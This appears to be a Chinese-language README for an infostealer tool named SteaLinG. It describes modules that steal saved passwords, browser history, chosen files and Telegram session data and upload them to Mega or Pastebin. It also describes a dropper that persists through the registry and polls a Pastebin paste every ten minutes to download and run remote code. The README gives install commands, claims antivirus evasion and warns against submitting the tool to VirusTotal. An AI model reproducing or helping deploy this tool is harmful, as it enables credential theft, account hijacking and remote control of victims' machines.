| 模块 | 简要描述 |
|---|---|
| 转储密码 | 窃取所有已保存的密码,将密码文件上传到 mega / pastebin |
| 转储历史记录 | 导出浏览器历史记录,将历史记录文件上传到 mega / pastebin |
| 转储文件 | 按指定扩展名从硬盘窃取文件,上传到 mega |
| Telegram 会话劫持 | Telegram 会话劫持,上传到 mega |
| Dropper | 见下方说明 |
| 模块 | 简要描述 |
|---|---|
| 1- Telegram 会话劫持 | Telegram 会话劫持 |
C:\Users\PC名称\AppData\Roaming\Telegram Desktop 下的 tdata 文件夹中。C:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
一旦你将此文件夹及其所有内容移动到你自己设备的相同路径下,只需执行所需操作即可。工具会处理一切,你只需在 https://mega.nz/ 网站上提供你的电子邮件和密码。第一步是定位 tdata 文件的位置,然后将其压缩为 zip 文件。如果 Telegram 正常运行,则不会出现此错误。如果出现错误,说明 Telegram 仍在运行,你需要终止其进程。你会注意到这种行为具有恶意性,因此我通过在代码中使用 try 和 except 完全避免了它。压缩包的文件名会使用受害者的设备名称,这样如果你有多个设备,就可以区分开来。之后,你将使用提供的电子邮件和密码在 mega 网站上提交该 zip 文件的请求。就是这样,它不会被任何杀毒软件检测到。
| 模块 |
|---|
| 2- Dropper |
.exe 或 .png 或其他重要扩展名。关键是 链接 必须以扩展名 (.任意扩展名) 结尾。
其次,你需要提供你的 API 密钥。你可以注册并点击 "API" 字样来找到它,然后记下 用户名 和 密码。
首先,在该网站上创建一个私有的 paste。然后,它会添加你提供的 URL,并生成可执行文件(exe)。其功能是:当它在任何设备上运行时,会以两种不同的方式将自己添加到设备的注册表中。
首先,它打开 Pastebin 网站并插入你创建的特定 paste。然后它获取 paste 的 URL,下载其内容并运行。此外,你可以在任何时间输入另一个 URL。这非常正常,因为 dropper 每 10 分钟检查一次该 URL。如果发现新的 URL,它会下载其内容、连接并继续运行。你无需做任何事情。因此,每 10 分钟你都可以从任何地方访问你的设备。
3- Linux 支持
4- 现在你可以选择 Mega 或 Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python3 -m pip install -r requirements.txt
python SteaLinG.py
* 不要上传到 VirusTotal.com,因为该工具将无法按时工作。
* VirusTotal 会与杀毒公司共享签名。
* 再说一遍,别犯傻!

